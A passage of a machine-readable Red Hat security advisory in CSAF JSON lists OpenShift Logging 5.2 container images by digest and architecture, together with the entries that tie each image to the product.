"name": "openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-64"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"product_id": "openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-71"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"product_id": "openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-74"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.2.4-4"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.2.4-4"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-67"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"product": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-44"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-47"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-66"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-64"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"product_id": "openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-71"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"product_id": "openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-74"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"product": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.2.4-4"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"product": {
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"product_id": "openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-operator-bundle\u0026tag=v5.2.4-17"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"product": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.2.4-4"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"product": {
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"product_id": "openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-operator-bundle\u0026tag=v5.2.4-17"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"product": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-67"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"product": {
"name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-44"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"product": {
"name": "openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"product_id": "openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-47"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"product": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"product_id": "openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"product_identification_helper": {
"purl": "pkg:oci/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-66"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"product": {
"name": "openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"product_id": "openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-64"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"product": {
"name": "openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"product_id": "openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"product_identification_helper": {
"purl": "pkg:oci/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-71"
}
}
},
{
"category": "product_version",
"name": "openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"product": {
"name": "openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"product_id": "openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-74"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64 as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64"
},
"product_reference": "openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64 as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64"
},
"product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64 as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64"
},
"product_reference": "openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64 as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64 as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x"
},
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64 as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x"
},
"product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64 as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x as a component of OpenShift Logging 5.2",
"product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.2"
},
{
"category": "default_component_of",
"full_product_name": {
